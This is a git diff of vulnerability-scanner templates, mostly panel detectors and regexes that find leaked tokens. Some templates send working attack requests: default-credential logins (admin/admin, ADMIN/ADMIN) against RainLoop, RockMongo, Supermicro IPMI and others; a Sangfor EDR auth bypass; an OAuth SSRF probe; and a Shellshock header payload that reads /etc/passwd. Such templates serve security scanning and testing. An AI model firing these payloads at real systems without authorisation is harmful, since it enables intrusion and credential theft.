e68bb8d17a..986920b438 100644 --- a/poc/auth/pure-storage-login-9724.yaml +++ b/poc/auth/pure-storage-login-9724.yaml @@ -1,24 +1,20 @@ id: pure-storage-login - info: name: Pure Storage Login author: dhiyaneshDK severity: info metadata: - shodan-query: 'http.title:"Pure Storage Login"' + shodan-query: http.title:"Pure Storage Login" tags: panel,purestorage - requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word words: - 'Pure Storage Login' - - type: status status: - 200 diff --git a/poc/auth/putty-private-key-disclosure-9730.yaml b/poc/auth/putty-private-key-disclosure-9730.yaml index d8aab1ea10..bdb1c932e8 100644 --- a/poc/auth/putty-private-key-disclosure-9730.yaml +++ b/poc/auth/putty-private-key-disclosure-9730.yaml @@ -3,8 +3,7 @@ info: name: Putty Private Key Disclosure author: dhiyaneshDk severity: medium - reference: - - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json tags: exposure,files requests: - method: GET diff --git a/poc/auth/rails-secret-token-disclosure-9810.yaml b/poc/auth/rails-secret-token-disclosure-9810.yaml index 387218b6c6..e4ee81cfd0 100644 --- a/poc/auth/rails-secret-token-disclosure-9810.yaml +++ b/poc/auth/rails-secret-token-disclosure-9810.yaml @@ -1,10 +1,13 @@ id: rails-secret-token-disclosure + info: name: Ruby on Rails Secret Token Disclosure author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json tags: exposure,files,rails,ruby,token + requests: - method: GET path: @@ -17,6 +20,7 @@ requests: - "config.secret_token =" part: body condition: and + - type: status status: - 200 diff --git a/poc/auth/rainloop-default-login-9812.yaml b/poc/auth/rainloop-default-login-9812.yaml index f5d8862f54..ad0cf18a01 100644 --- a/poc/auth/rainloop-default-login-9812.yaml +++ b/poc/auth/rainloop-default-login-9812.yaml @@ -1,4 +1,5 @@ id: rainloop-default-login + info: name: Rainloop WebMail Default Login author: For3stCo1d @@ -8,23 +9,28 @@ info: metadata: fofa-query: app="RAINLOOP-WebMail" tags: rainloop,webmail,default-login,foss + requests: - raw: - | # Login Portal: /?admin GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1 Host: {{Hostname}} + - | POST /?/Ajax/&q[]=/0/ HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}} + attack: pitchfork payloads: user: - admin + pass: - 12345 + cookie-reuse: true extractors: - type: regex @@ -33,6 +39,7 @@ requests: group: 1 regex: - 'token":"(.+?)"' + matchers-condition: and matchers: - type: word @@ -40,6 +47,7 @@ requests: - '"Action":"AdminLogin"' - '"Result":true' condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/auth/remote-ui-login-9859.yaml b/poc/auth/remote-ui-login-9859.yaml index 096ee181a2..d869206a4d 100644 --- a/poc/auth/remote-ui-login-9859.yaml +++ b/poc/auth/remote-ui-login-9859.yaml @@ -3,7 +3,8 @@ info: name: Remote UI Login author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6815 + reference: + - https://www.exploit-db.com/ghdb/6815 tags: panel requests: - method: GET diff --git a/poc/auth/rockmongo-default-login-9897.yaml b/poc/auth/rockmongo-default-login-9897.yaml index d1164252a3..5e22fa91ad 100644 --- a/poc/auth/rockmongo-default-login-9897.yaml +++ b/poc/auth/rockmongo-default-login-9897.yaml @@ -1,17 +1,18 @@ id: rockmongo-default-login + info: name: Rockmongo Default Login author: pikpikcu severity: high description: Rockmongo default admin credentials were discovered. - tags: rockmongo,default-login reference: - https://serverfault.com/questions/331315/how-to-change-the-default-admin-username-and-admin-password-in-rockmongo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + tags: rockmongo,default-login + requests: - raw: - | @@ -21,19 +22,23 @@ requests: Referer: {{Hostname}}/index.php?action=login.index more=0&host=0&username={{username}}&password={{password}}&db=&lang=en_us&expire=3 + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: + - type: word words: - "Location: /index.php?action=admin.index&host=0" - "Set-Cookie: ROCK_LANG=" part: header + - type: status status: - 302 diff --git a/poc/auth/saferoads-vms-login-9970.yaml b/poc/auth/saferoads-vms-login-9970.yaml index ae25e07dfe..7ff21d63ee 100644 --- a/poc/auth/saferoads-vms-login-9970.yaml +++ b/poc/auth/saferoads-vms-login-9970.yaml @@ -1,13 +1,10 @@ id: saferoads-vms-login - info: name: Saferoads VMS Login author: dhiyaneshDk severity: info - reference: - - https://www.exploit-db.com/ghdb/6941 - tags: panel - + tags: login + reference: https://www.exploit-db.com/ghdb/6941 requests: - method: GET path: @@ -15,4 +12,4 @@ requests: matchers: - type: word words: - - 'Saferoads VMS' \ No newline at end of file + - 'Saferoads VMS' diff --git a/poc/auth/sangfor-edr-auth-bypass-10022.yaml b/poc/auth/sangfor-edr-auth-bypass-10022.yaml index 5070ea2769..f92ce01d6f 100644 --- a/poc/auth/sangfor-edr-auth-bypass-10022.yaml +++ b/poc/auth/sangfor-edr-auth-bypass-10022.yaml @@ -1,4 +1,5 @@ id: sangfor-edr-auth-bypass + info: name: Sangfor EDR Authentication Bypass author: princechaddha @@ -9,25 +10,30 @@ info: metadata: fofa-query: app="sangfor" tags: sangfor,auth-bypass,login + requests: - method: GET path: - "{{BaseURL}}/ui/login.php?user=admin" + matchers-condition: and matchers: - type: word part: body words: - "/download/edr_installer_" + - type: word part: header words: - 'Set-Cookie=""' negative: true + - type: word part: header words: - 'Set-Cookie=' + - type: status status: - 302 diff --git a/poc/auth/sauter-login-10089.yaml b/poc/auth/sauter-login-10089.yaml index 052a5a3773..cb5d984cf1 100644 --- a/poc/auth/sauter-login-10089.yaml +++ b/poc/auth/sauter-login-10089.yaml @@ -3,7 +3,8 @@ info: name: Sauter moduWeb - Login author: DhiyaneshDk severity: info - reference: https://www.exploit-db.com/ghdb/6883 + reference: + - https://www.exploit-db.com/ghdb/6883 tags: panel,sauter requests: - method: GET diff --git a/poc/auth/sequoiadb-default-login-10152.yaml b/poc/auth/sequoiadb-default-login-10152.yaml index 39348896d3..bbef4dfd07 100644 --- a/poc/auth/sequoiadb-default-login-10152.yaml +++ b/poc/auth/sequoiadb-default-login-10152.yaml @@ -3,8 +3,15 @@ info: name: SequoiaDB Default Login author: dhiyaneshDk severity: high - description: Searches for default admin credentials for the SequoiaDB application. + description: SequoiaDB default admin credentials were discovered. tags: default-login,sequoiadb + reference: + - https://www.sequoiadb.com/en/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: - | @@ -35,3 +42,5 @@ requests: part: body words: - '{ "errno": 0 }' + +# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/server-backup-login-10154.yaml b/poc/auth/server-backup-login-10154.yaml index 35a3e131d5..0639ab5356 100644 --- a/poc/auth/server-backup-login-10154.yaml +++ b/poc/auth/server-backup-login-10154.yaml @@ -1,10 +1,10 @@ id: server-backup-login info: name: Server Backup Manager SE Login - author: dhiyaneshDKi,pathtaga + author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6949 - tags: paneil,idera + tags: panel requests: - method: GET path: diff --git a/poc/auth/servicedesk-login-panel-10171.yaml b/poc/auth/servicedesk-login-panel-10171.yaml index 5d949bca29..230750434b 100644 --- a/poc/auth/servicedesk-login-panel-10171.yaml +++ b/poc/auth/servicedesk-login-panel-10171.yaml @@ -1,24 +1,22 @@ id: servicedesk-login-panel - info: name: Servicedesk Login Panel Detector author: aashiq severity: info description: Searches for ServiceDesk login panels by trying to query the "/servicedesk/customer/user/login" endpoint + metadata: + shodan-query: http.component:"Atlassian Confluence" tags: servicedesk,confluence,jira,panel,login - requests: - method: GET path: - "{{BaseURL}}/servicedesk/customer/user/login" - "{{BaseURL}}/servicedesk/customer/portal/10/user/login" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "https://confluence.atlassian.com" diff --git a/poc/auth/sgp-login-panel-10185.yaml b/poc/auth/sgp-login-panel-10185.yaml index b608b20d00..15ee1ecf69 100644 --- a/poc/auth/sgp-login-panel-10185.yaml +++ b/poc/auth/sgp-login-panel-10185.yaml @@ -1,23 +1,27 @@ id: sgp-login-panel + info: name: SGP Panel author: dhiyaneshDK severity: info - metadata: - shodan-query: http.title:"SGP" + reference: https://www.shodan.io/search?query=http.title%3A%22SGP%22 tags: panel,sgp + requests: - method: GET path: - '{{BaseURL}}/accounts/login?next=/admin/' + matchers-condition: and matchers: - type: word words: - 'SGP' + - type: status status: - 200 + extractors: - type: regex part: body diff --git a/poc/auth/sharecenter-login-10187.yaml b/poc/auth/sharecenter-login-10187.yaml index d41580c34c..929f60a7e4 100644 --- a/poc/auth/sharecenter-login-10187.yaml +++ b/poc/auth/sharecenter-login-10187.yaml @@ -1,11 +1,9 @@ id: sharecenter-login - info: name: ShareCenter Login Page author: dhiyaneshDk severity: info reference: https://www.exploit-db.com/ghdb/6892 - requests: - method: GET path: diff --git a/poc/auth/shopify-custom-token(1).yaml b/poc/auth/shopify-custom-token(1).yaml new file mode 100644 index 0000000000..fbdd23d61d --- /dev/null +++ b/poc/auth/shopify-custom-token(1).yaml @@ -0,0 +1,16 @@ +id: shopify-custom-token + +info: + name: Shopify Custom App Access Token + author: gaurang + severity: high + tags: token,file + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "shpca_[a-fA-F0-9]{32}" \ No newline at end of file diff --git a/poc/auth/shopify-custom-token-11860.yaml b/poc/auth/shopify-custom-token-11860.yaml index fbdd23d61d..b4ef9d4c53 100644 --- a/poc/auth/shopify-custom-token-11860.yaml +++ b/poc/auth/shopify-custom-token-11860.yaml @@ -1,16 +1,13 @@ id: shopify-custom-token - info: name: Shopify Custom App Access Token author: gaurang severity: high tags: token,file - file: - extensions: - all - extractors: - type: regex regex: - - "shpca_[a-fA-F0-9]{32}" \ No newline at end of file + - "shpca_[a-fA-F0-9]{32}" diff --git a/poc/auth/shopify-private-token-10199.yaml b/poc/auth/shopify-private-token-10199.yaml index 2402b653b6..4c8c3d8791 100644 --- a/poc/auth/shopify-private-token-10199.yaml +++ b/poc/auth/shopify-private-token-10199.yaml @@ -1,13 +1,16 @@ id: shopify-private-token + info: name: Shopify Private App Access Token author: gaurang severity: high - tags: token,file + tags: file,keys,token file: - extensions: - all + extractors: - type: regex regex: - "shppa_[a-fA-F0-9]{32}" +# digest: 4b0a004830460221008a9fcfd1953cd27472015171cc2ff718e69112124812210ea6ba818da8c0de17022100a5dd54d3323017b989e594baf393a6915d32c96622b2be024cfad826b8a9d773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/shopify-token(1).yaml b/poc/auth/shopify-token(1).yaml index a60878623e..1dae9c0b9f 100644 --- a/poc/auth/shopify-token(1).yaml +++ b/poc/auth/shopify-token(1).yaml @@ -4,8 +4,7 @@ info: name: Shopify Access Token author: gaurang severity: high - tags: token,file - + tags: file,keys,token file: - extensions: - all @@ -13,4 +12,5 @@ file: extractors: - type: regex regex: - - "shpat_[a-fA-F0-9]{32}" \ No newline at end of file + - "shpat_[a-fA-F0-9]{32}" +# digest: 4a0a0047304502200b41777dd82b3d396f4d76d75a526b7f5f863f8f1d2b4e313990480c398917ef022100810ddcd217e57655538d9153e898ad34e32c9b3179aceac031fbaf698de6ecc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/showdoc-default-login-10221.yaml b/poc/auth/showdoc-default-login-10221.yaml index 66a630d300..597a3657bb 100644 --- a/poc/auth/showdoc-default-login-10221.yaml +++ b/poc/auth/showdoc-default-login-10221.yaml @@ -1,4 +1,5 @@ id: showdoc-default-login + info: name: Showdoc Default Login author: pikpikcu @@ -11,6 +12,7 @@ info: cvss-score: 5.8 cwe-id: CWE-522 tags: showdoc,default-login + requests: - raw: - | @@ -19,19 +21,23 @@ requests: Content-Type: application/x-www-form-urlencoded;charset=UTF-8 username={{username}}&password={{password}}&v_code= + payloads: username: - showdoc password: - 123456 attack: pitchfork + matchers-condition: and matchers: + - type: word words: - '"username":"showdoc"' - '"user_token":' condition: and + - type: status status: - 200 diff --git a/poc/auth/sitefinity-login-10298.yaml b/poc/auth/sitefinity-login-10298.yaml index 963c89df89..e660eea626 100644 --- a/poc/auth/sitefinity-login-10298.yaml +++ b/poc/auth/sitefinity-login-10298.yaml @@ -1,14 +1,19 @@ id: sitefinity-login + info: name: Sitefinity Login author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6722 - tags: panel + description: This template identifies the Sitefinity login page. + reference: + - https://www.exploit-db.com/ghdb/6722 + tags: panel,sitefinity + requests: - method: GET path: - '{{BaseURL}}/Sitefinity/Authenticate/SWT' + matchers-condition: and matchers: - type: word @@ -17,3 +22,5 @@ requests: - type: status status: - 200 + +# Enhanced by cs on 2022/02/28 diff --git a/poc/auth/siteomat-login-10301.yaml b/poc/auth/siteomat-login-10301.yaml index 29e261d1d9..de5e63a8ba 100644 --- a/poc/auth/siteomat-login-10301.yaml +++ b/poc/auth/siteomat-login-10301.yaml @@ -1,5 +1,4 @@ id: siteomat-loader - info: name: Orpak SiteOmat login portals author: dhiyaneshDK @@ -7,12 +6,10 @@ info: reference: - https://www.exploit-db.com/ghdb/6624 tags: panel,siteomat,login - requests: - method: GET path: - '{{BaseURL}}/login.htm' - matchers-condition: and matchers: - type: word diff --git a/poc/auth/solar-log-authbypass-10352.yaml b/poc/auth/solar-log-authbypass-10352.yaml index 7e3f5cd21d..fa04aaac7c 100644 --- a/poc/auth/solar-log-authbypass-10352.yaml +++ b/poc/auth/solar-log-authbypass-10352.yaml @@ -1,32 +1,32 @@ id: solar-log-authbypass - info: name: Solar-Log 500 2.8.2 - Incorrect Access Control author: geeknik severity: high - description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server - reference: https://www.exploit-db.com/exploits/49986 + description: Solar-Log 500 2.8.2 is susceptible to incorrect access control because the web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server. + reference: + - https://www.exploit-db.com/exploits/49986 + classification: + cwe-id: CWE-284 tags: solarlog,auth-bypass - requests: - method: GET path: - "{{BaseURL}}/lan.html" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: header words: - "IPC@CHIP" - - type: word part: body words: - " Solare Datensysteme GmbH" - "mailto:info@solar-log.com" condition: and + +# Enhanced by mp on 2022/04/12 diff --git a/poc/auth/solarwinds-default-login-10355.yaml b/poc/auth/solarwinds-default-login-10355.yaml index f2391f8c00..64d31401a7 100644 --- a/poc/auth/solarwinds-default-login-10355.yaml +++ b/poc/auth/solarwinds-default-login-10355.yaml @@ -1,39 +1,25 @@ id: solarwinds-default-admin info: - name: SolarWinds Orion Default Login + name: SolarWinds Orion Default Credentials author: dwisiswant0 severity: high - description: SolarWinds Orion default admin credentials were discovered. - reference: - - https://github.com/solarwinds/OrionSDK/wiki/REST - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: solarwinds,default-login -# Optional: -# POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 -# {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} + # Optional: + # POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 + # {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} -requests: - - raw: - - | - GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username)}} - - - | - GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username)}} - - payloads: - username: - - admin - attack: pitchfork + # References: + # - https://github.com/solarwinds/OrionSDK/wiki/REST +requests: + - method: GET + path: + - "{{BaseURL}}/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS" # First path is default base path + - "{{BaseURL}}/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS" + headers: + Authorization: "Basic YWRtaW46" matchers-condition: and matchers: - type: word @@ -49,5 +35,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/sonarqube-login-10374.yaml b/poc/auth/sonarqube-login-10374.yaml index cd8db812f2..1f9ab0f8cd 100644 --- a/poc/auth/sonarqube-login-10374.yaml +++ b/poc/auth/sonarqube-login-10374.yaml @@ -1,13 +1,16 @@ id: sonarqube-login + info: name: SonarQube panel detect author: dhiyaneshDk severity: info - tags: panel + tags: panel,sonarqube + requests: - method: GET path: - "{{BaseURL}}/sessions/new" + matchers: - type: word words: diff --git a/poc/auth/spark-webui-unauth-10400.yaml b/poc/auth/spark-webui-unauth-10400.yaml index a917ae6951..6ca1120cb0 100644 --- a/poc/auth/spark-webui-unauth-10400.yaml +++ b/poc/auth/spark-webui-unauth-10400.yaml @@ -1,14 +1,18 @@ id: spark-webui-unauth + info: name: Unauthenticated Spark WebUI author: princechaddha severity: medium - reference: https://github.com/vulhub/vulhub/tree/master/spark/unacc + reference: + - https://github.com/vulhub/vulhub/tree/master/spark/unacc tags: spark,unauth + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: status diff --git a/poc/auth/spectracom-default-login-10405.yaml b/poc/auth/spectracom-default-login-10405.yaml index f091831f32..e471d4861a 100644 --- a/poc/auth/spectracom-default-login-10405.yaml +++ b/poc/auth/spectracom-default-login-10405.yaml @@ -5,13 +5,14 @@ info: author: madrobot severity: high description: Spectracom default admin credentials were discovered. + tags: spectracom,default-login reference: - https://orolia.com/manuals/NC/Content/NC_and_SS/Com/Topics/ADMIN/Passwords.htm classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - tags: spectracom,default-login requests: - raw: diff --git a/poc/auth/sphider-login-10408.yaml b/poc/auth/sphider-login-10408.yaml index becae53fbd..f9ac4a5606 100644 --- a/poc/auth/sphider-login-10408.yaml +++ b/poc/auth/sphider-login-10408.yaml @@ -3,8 +3,7 @@ info: name: Sphider Admin Login author: dhiyaneshDK severity: info - reference: - - https://www.exploit-db.com/ghdb/6641 + reference: https://www.exploit-db.com/ghdb/6641 tags: panel requests: - method: GET diff --git a/poc/auth/square-access-token(1).yaml b/poc/auth/square-access-token(1).yaml index 5601c992e7..899721c81d 100644 --- a/poc/auth/square-access-token(1).yaml +++ b/poc/auth/square-access-token(1).yaml @@ -4,8 +4,7 @@ info: name: Square Access Token author: gaurang,daffainfo severity: high - tags: token,file,square - + tags: file,keys,token,square file: - extensions: - all @@ -15,3 +14,4 @@ file: regex: - "EAAAE[a-zA-Z0-9_-]{59}" - "sq0atp-[0-9A-Za-z\\-_]{22}" +# digest: 490a00463044022016fc50e7940f4fb9d85db1563b7e86d644facdd66f530692b600d6cb0c4d3438022050fff84340f9f8afe3efbaeb9063ebc13bb5f4df8c13f328258d07ee43cc1998:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/square-oauth-secret-11868.yaml b/poc/auth/square-oauth-secret-11868.yaml index 86392888a8..92c8a33c44 100644 --- a/poc/auth/square-oauth-secret-11868.yaml +++ b/poc/auth/square-oauth-secret-11868.yaml @@ -1,13 +1,16 @@ id: square-oauth-secret + info: name: Square OAuth Secret author: gaurang severity: high - tags: token,file,square + tags: file,keys,token,square file: - extensions: - all + extractors: - type: regex regex: - "sq0csp-[0-9A-Za-z\\-_]{43}" +# digest: 4b0a00483046022100b9d713ce6825a6aa6f3a38bb156f20588d72be414cdb570f0946f7dda4c809c7022100ab886a6c8e1afb2b271507fc2fe390137235ad84e1de02247de49ee5a86e3cfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/ssrf-via-oauth-misconfig-10526.yaml b/poc/auth/ssrf-via-oauth-misconfig-10526.yaml index 2059195b06..9fe1869a10 100644 --- a/poc/auth/ssrf-via-oauth-misconfig-10526.yaml +++ b/poc/auth/ssrf-via-oauth-misconfig-10526.yaml @@ -1,14 +1,11 @@ id: ssrf-via-oauth-misconfig - info: name: SSRF due to misconfiguration in OAuth author: KabirSuda severity: medium description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters. - reference: - - https://portswigger.net/research/hidden-oauth-attack-vectors tags: misconfig,oast,oauth,ssrf - + reference: https://portswigger.net/research/hidden-oauth-attack-vectors requests: - raw: - | @@ -26,9 +23,8 @@ requests: "token_endpoint_auth_method": "client_secret_basic", "request_uris": ["https://{{interactsh-url}}"] } - matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" diff --git a/poc/auth/stripe-restricted-key-10553.yaml b/poc/auth/stripe-restricted-key-10553.yaml index cdf368d652..4896123a98 100644 --- a/poc/auth/stripe-restricted-key-10553.yaml +++ b/poc/auth/stripe-restricted-key-10553.yaml @@ -1,11 +1,9 @@ id: stripe-restricted-key - info: name: Stripe Restricted Key Disclosure author: Ice3man severity: info tags: exposure,token,stripe - requests: - method: GET path: diff --git a/poc/auth/supermicro-default-login-10572.yaml b/poc/auth/supermicro-default-login-10572.yaml index 96567eaaac..9f139bf91d 100644 --- a/poc/auth/supermicro-default-login-10572.yaml +++ b/poc/auth/supermicro-default-login-10572.yaml @@ -1,5 +1,4 @@ id: supermicro-default-login - info: name: Supermicro Ipmi - Default Admin Login author: For3stCo1d @@ -8,7 +7,6 @@ info: reference: - https://www.gearprimer.com/wiki/supermicro-ipmi-default-username-pasword/ tags: supermicro,default-login - requests: - raw: - | @@ -17,7 +15,6 @@ requests: Content-Type: application/x-www-form-urlencoded name={{user}}&pwd={{pass}} - attack: pitchfork payloads: user: @@ -26,7 +23,6 @@ requests: pass: - ADMIN - admin - stop-at-first-match: true matchers-condition: and matchers: @@ -36,7 +32,6 @@ requests: - 'self.location=' - '/cgi/url_redirect.cgi?url_name=mainmenu' condition: and - - type: status status: - 200 diff --git a/poc/auth/symantec-dlp-login-10598.yaml b/poc/auth/symantec-dlp-login-10598.yaml index ed62416082..ea487ce2b4 100644 --- a/poc/auth/symantec-dlp-login-10598.yaml +++ b/poc/auth/symantec-dlp-login-10598.yaml @@ -3,7 +3,8 @@ info: name: Symantec Data Loss Prevention author: princechaddha severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Data+Loss+Prevention%22 + metadata: + shodan-query: http.title:"Symantec Data Loss Prevention" tags: symantec,panel,login requests: - method: GET diff --git a/poc/auth/symantec-ewep-login-10605.yaml b/poc/auth/symantec-ewep-login-10605.yaml index f0f9fafaa1..835a5f9663 100644 --- a/poc/auth/symantec-ewep-login-10605.yaml +++ b/poc/auth/symantec-ewep-login-10605.yaml @@ -3,8 +3,8 @@ info: name: Symantec Encryption Web Email Protection author: johnk3r severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22 + metadata: + shodan-query: http.title:"Symantec Encryption Server" tags: panel,symantec,login requests: - method: GET diff --git a/poc/auth/szhe-default-login-10635.yaml b/poc/auth/szhe-default-login-10635.yaml index b99b7309fe..c1be8a2077 100644 --- a/poc/auth/szhe-default-login-10635.yaml +++ b/poc/auth/szhe-default-login-10635.yaml @@ -3,16 +3,15 @@ id: szhe-default-login info: name: Szhe Default Login author: pikpikcu - description: Szhe default login information was discovered. severity: medium - tags: szhe,default-login + description: Szhe default login information was discovered. reference: - - https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage + - https://github.com/Cl0udG0d/SZhe_Scan classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 - cve-id: cwe-id: CWE-522 + tags: szhe,default-login requests: - raw: diff --git a/poc/auth/telecom-gateway-default-login-10686.yaml b/poc/auth/telecom-gateway-default-login-10686.yaml index 93f096ed63..73abc6eada 100644 --- a/poc/auth/telecom-gateway-default-login-10686.yaml +++ b/poc/auth/telecom-gateway-default-login-10686.yaml @@ -5,9 +5,11 @@ info: author: ritikchaddha severity: high description: Telecom Gateway default admin login credentials were successful. + metadata: + max-request: 1 tags: default-login,telecom,gateway -requests: +http: - raw: - | POST /manager/login.php HTTP/1.1 @@ -21,9 +23,9 @@ requests: - admin password: - admin - - redirects: true + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -38,4 +40,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/07/04 +# digest: 4a0a00473045022100a367ccbfabd23210af96b3439c4ba6cbe08f9800ae62553ccd130828136642480220114c4652ae60ed84e6ae4c520992c75d8e25f826fd02f172fcc9e416309fe566:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/threatq-login-10757.yaml b/poc/auth/threatq-login-10757.yaml index cb351c7f05..3a86a615fb 100644 --- a/poc/auth/threatq-login-10757.yaml +++ b/poc/auth/threatq-login-10757.yaml @@ -1,4 +1,5 @@ id: threatq-login + info: name: ThreatQ login panel author: idealphase @@ -7,10 +8,12 @@ info: reference: - https://www.threatq.com/threat-intelligence-platform/ tags: panel,threatq + requests: - method: GET path: - '{{BaseURL}}/login' + matchers-condition: and matchers: - type: word @@ -18,9 +21,11 @@ requests: - 'ThreatQ' - '" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/poc/cve/cve-2013-4625.yaml b/poc/cve/cve-2013-4625.yaml index cb43678dcc..81f60cc764 100644 --- a/poc/cve/cve-2013-4625.yaml +++ b/poc/cve/cve-2013-4625.yaml @@ -5,13 +5,15 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. - remediation: Upgrade to Duplicator 0.4.5 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-4625 - https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html - tags: cve,cve2013,wordpress,xss,wp-plugin + - http://osvdb.org/95627 + - http://archives.neohapsis.com/archives/bugtraq/2013-07/0161.html + remediation: Upgrade to Duplicator 0.4.5 or later. classification: cve-id: CVE-2013-4625 + tags: cve,cve2013,wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/cve/cve-2014-10037.yaml b/poc/cve/cve-2014-10037.yaml index 37bbb8da07..35aa39b4b4 100644 --- a/poc/cve/cve-2014-10037.yaml +++ b/poc/cve/cve-2014-10037.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/exploits/30865 - https://www.cvedetails.com/cve/CVE-2014-10037 - https://nvd.nist.gov/vuln/detail/CVE-2014-10037 - - http://www.exploit-db.com/exploits/30865 + - http://osvdb.org/show/osvdb/102204 classification: cve-id: CVE-2014-10037 tags: cve,cve2014,lfi diff --git a/poc/cve/cve-2014-6271.yaml b/poc/cve/cve-2014-6271.yaml new file mode 100644 index 0000000000..66122b3290 --- /dev/null +++ b/poc/cve/cve-2014-6271.yaml @@ -0,0 +1,49 @@ +id: CVE-2014-6271 + +info: + name: ShellShock - Remote Code Execution + author: pentest_swissky,0xelkomy + severity: critical + description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-6271 + - https://nvd.nist.gov/vuln/detail/CVE-2014-7169 + - http://www.kb.cert.org/vuls/id/252743 + - http://www.us-cert.gov/ncas/alerts/TA14-268A + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2014-6271 + cwe-id: CWE-78 + tags: cve,cve2014,rce,shellshock + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/cgi-bin/status" + - "{{BaseURL}}/cgi-bin/stats" + - "{{BaseURL}}/cgi-bin/test" + - "{{BaseURL}}/cgi-bin/status/status.cgi" + - "{{BaseURL}}/test.cgi" + - "{{BaseURL}}/debug.cgi" + - "{{BaseURL}}/cgi-bin/test-cgi" + + headers: + Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + 